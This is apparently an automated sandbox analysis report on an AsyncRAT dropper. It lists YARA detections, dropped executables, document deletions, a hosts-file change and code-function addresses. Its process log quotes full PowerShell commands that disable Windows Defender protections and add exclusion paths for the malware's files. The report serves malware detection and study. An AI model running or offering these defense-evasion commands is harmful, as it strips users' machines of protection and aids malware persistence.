Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49732 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\Built.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\VLZDGUKUTZ.docx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\VLZDGUKUTZ.docx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\UMMBDNEQBN.xlsx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\KZWFNRXYKI.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\KZWFNRXYKI.png	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\Built.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: Vjy8d2EoqK.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.0.S l r .exe.409294.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.3.S l r .exe.569e78.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.0.S l r .exe.409294.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.3.S l r .exe.569e78.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.0.XClient.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.0.S l r .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.Vjy8d2EoqK.exe.adfe9c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.Vjy8d2EoqK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.Vjy8d2EoqK.exe.40936c.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\S l r .exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'

Source: C:\Users\user\AppData\Local\Temp\svchosts.exe

Code function: 2_2_0029718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

2_2_0029718C

Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Windows\SysWOW64\it-IT\dasHost.exe
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Windows\SysWOW64\it-IT\21b1a557fd31cc
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Windows\addins\cmd.exe
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Windows\addins\ebf1f9fa8afd6d
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Windows\apppatch\en-US\conhost.exe
Source: C:\Brokercrt\comReviewsession.exe	File created: C:\Windows\apppatch\en-US\088424020bedd6

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5C1000	1_2_00007FF76D5C1000
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5E5C74	1_2_00007FF76D5E5C74
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5DFBD8	1_2_00007FF76D5DFBD8
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D0E70	1_2_00007FF76D5D0E70
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5E4F10	1_2_00007FF76D5E4F10
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5DCD6C	1_2_00007FF76D5DCD6C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5C95FB	1_2_00007FF76D5C95FB
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5DD880	1_2_00007FF76D5DD880
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D1074	1_2_00007FF76D5D1074
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D5040	1_2_00007FF76D5D5040
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D28C0	1_2_00007FF76D5D28C0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5E2F20	1_2_00007FF76D5E2F20
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5DFBD8	1_2_00007FF76D5DFBD8
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D1F30	1_2_00007FF76D5D1F30
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5E5728	1_2_00007FF76D5E5728
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5C9FCD	1_2_00007FF76D5C9FCD
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5C979B	1_2_00007FF76D5C979B
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D1280	1_2_00007FF76D5D1280
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D0A60	1_2_00007FF76D5D0A60
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5E8A38	1_2_00007FF76D5E8A38
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D7AAC	1_2_00007FF76D5D7AAC
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5E518C	1_2_00007FF76D5E518C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5DD200	1_2_00007FF76D5DD200
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D91B0	1_2_00007FF76D5D91B0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D1484	1_2_00007FF76D5D1484
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D0C64	1_2_00007FF76D5D0C64
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D2CC4	1_2_00007FF76D5D2CC4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5E0B84	1_2_00007FF76D5E0B84
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5C8B20	1_2_00007FF76D5C8B20
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D73F4	1_2_00007FF76D5D73F4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5E33BC	1_2_00007FF76D5E33BC
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_0029857B	2_2_0029857B
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002BD00E	2_2_002BD00E
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_0029407E	2_2_0029407E
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002A70BF	2_2_002A70BF
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002C1194	2_2_002C1194
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_0029E2A0	2_2_0029E2A0
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_00293281	2_2_00293281
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002B02F6	2_2_002B02F6
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002A6646	2_2_002A6646
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002B473A	2_2_002B473A
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002B070E	2_2_002B070E
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002927E8	2_2_002927E8
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002A37C1	2_2_002A37C1
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_0029E8A0	2_2_0029E8A0
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_0029F968	2_2_0029F968
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002B4969	2_2_002B4969
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002A3A3C	2_2_002A3A3C
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002A6A7B	2_2_002A6A7B
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002BCB60	2_2_002BCB60
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002B0B43	2_2_002B0B43
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002A5C77	2_2_002A5C77
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_0029ED14	2_2_0029ED14
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002A3D6D	2_2_002A3D6D
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002AFDFA	2_2_002AFDFA
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_0029BE13	2_2_0029BE13
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_0029DE6C	2_2_0029DE6C
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_00295F3C	2_2_00295F3C
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002B0F78	2_2_002B0F78
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5C1000	3_2_00007FF76D5C1000
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5E5C74	3_2_00007FF76D5E5C74
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D0E70	3_2_00007FF76D5D0E70
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5E4F10	3_2_00007FF76D5E4F10
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5DCD6C	3_2_00007FF76D5DCD6C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5C95FB	3_2_00007FF76D5C95FB
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5DD880	3_2_00007FF76D5DD880
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D1074	3_2_00007FF76D5D1074
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D5040	3_2_00007FF76D5D5040
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D28C0	3_2_00007FF76D5D28C0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5E2F20	3_2_00007FF76D5E2F20
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5DFBD8	3_2_00007FF76D5DFBD8
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D1F30	3_2_00007FF76D5D1F30
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5E5728	3_2_00007FF76D5E5728
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5C9FCD	3_2_00007FF76D5C9FCD
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5C979B	3_2_00007FF76D5C979B
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D1280	3_2_00007FF76D5D1280
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D0A60	3_2_00007FF76D5D0A60
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5E8A38	3_2_00007FF76D5E8A38
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D7AAC	3_2_00007FF76D5D7AAC
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5E518C	3_2_00007FF76D5E518C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5DD200	3_2_00007FF76D5DD200
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D91B0	3_2_00007FF76D5D91B0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D1484	3_2_00007FF76D5D1484
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D0C64	3_2_00007FF76D5D0C64
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D2CC4	3_2_00007FF76D5D2CC4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5E0B84	3_2_00007FF76D5E0B84
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5C8B20	3_2_00007FF76D5C8B20
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5DFBD8	3_2_00007FF76D5DFBD8
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D73F4	3_2_00007FF76D5D73F4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5E33BC	3_2_00007FF76D5E33BC
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF70318A0	3_2_00007FFDF70318A0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF715B360	3_2_00007FFDF715B360
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF71517BE	3_2_00007FFDF71517BE
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7151A8C	3_2_00007FFDF7151A8C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF716F660	3_2_00007FFDF716F660
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF715115E	3_2_00007FFDF715115E
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF71612F0	3_2_00007FFDF71612F0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF71515B4	3_2_00007FFDF71515B4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7151BE0	3_2_00007FFDF7151BE0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF715199C	3_2_00007FFDF715199C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7151398	3_2_00007FFDF7151398
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF715114F	3_2_00007FFDF715114F
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7201AA0	3_2_00007FFDF7201AA0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF715F9C5	3_2_00007FFDF715F9C5
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7151451	3_2_00007FFDF7151451
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF71513F2	3_2_00007FFDF71513F2
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF72125F4	3_2_00007FFDF72125F4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7214638	3_2_00007FFDF7214638
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF721177B	3_2_00007FFDF721177B
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF722C620	3_2_00007FFDF722C620
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF722C480	3_2_00007FFDF722C480
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF72172C5	3_2_00007FFDF72172C5
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7212144	3_2_00007FFDF7212144
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF72169E7	3_2_00007FFDF72169E7
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF72C0440	3_2_00007FFDF72C0440
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7212C7A	3_2_00007FFDF7212C7A
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7215B14	3_2_00007FFDF7215B14
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF73B4170	3_2_00007FFDF73B4170
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7214106	3_2_00007FFDF7214106
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7215B78	3_2_00007FFDF7215B78
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7213FDF	3_2_00007FFDF7213FDF
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF721655F	3_2_00007FFDF721655F
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7216A87	3_2_00007FFDF7216A87
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7211F9B	3_2_00007FFDF7211F9B
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF72121BC	3_2_00007FFDF72121BC
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7216F28	3_2_00007FFDF7216F28
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF72160A0	3_2_00007FFDF72160A0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7450E00	3_2_00007FFDF7450E00
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7593B10	3_2_00007FFDF7593B10
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7602970	3_2_00007FFDF7602970
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF762E8A0	3_2_00007FFDF762E8A0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF75A0860	3_2_00007FFDF75A0860
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF75BB870	3_2_00007FFDF75BB870
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF7596902	3_2_00007FFDF7596902
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDF75D6900	3_2_00007FFDF75D6900
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFDFB8998A0	3_2_00007FFDFB8998A0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFE1024A078	3_2_00007FFE1024A078
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFE10248958	3_2_00007FFE10248958
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFE10249A38	3_2_00007FFE10249A38
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFE1026BA60	3_2_00007FFE1026BA60
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FFE10249640	3_2_00007FFE10249640
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 6_2_00007FFD9B2A1679	6_2_00007FFD9B2A1679
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 6_2_00007FFD9B2AA662	6_2_00007FFD9B2AA662
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 6_2_00007FFD9B2A98B6	6_2_00007FFD9B2A98B6
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 6_2_00007FFD9B2A204D	6_2_00007FFD9B2A204D
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 6_2_00007FFD9B2A16B9	6_2_00007FFD9B2A16B9
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 6_2_00007FFD9B2A00AD	6_2_00007FFD9B2A00AD
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 6_2_00007FFD9B2A62A8	6_2_00007FFD9B2A62A8
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Code function: 6_2_00007FFD9B2A0EFA	6_2_00007FFD9B2A0EFA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Code function: 7_2_00AD0890	7_2_00AD0890
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Code function: 7_2_00AD0880	7_2_00AD0880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD9B2900AD	17_2_00007FFD9B2900AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD9B363027	17_2_00007FFD9B363027
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFD9B2C00AD	21_2_00007FFD9B2C00AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFD9B3930E9	21_2_00007FFD9B3930E9

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF721405C appears 123 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FF76D5C25F0 appears 100 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF7211EF6 appears 255 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF7212739 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF75994C0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FF76D5C2760 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF71512EE appears 325 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF71BDFBF appears 126 times
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: String function: 00007FFDF71BE055 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: String function: 002AE28C appears 35 times
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: String function: 002AED00 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: String function: 002AE360 appears 52 times

Source: Vjy8d2EoqK.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
Source: Vjy8d2EoqK.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: Vjy8d2EoqK.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: S l r .exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: S l r .exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: rar.exe.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs Vjy8d2EoqK.exe
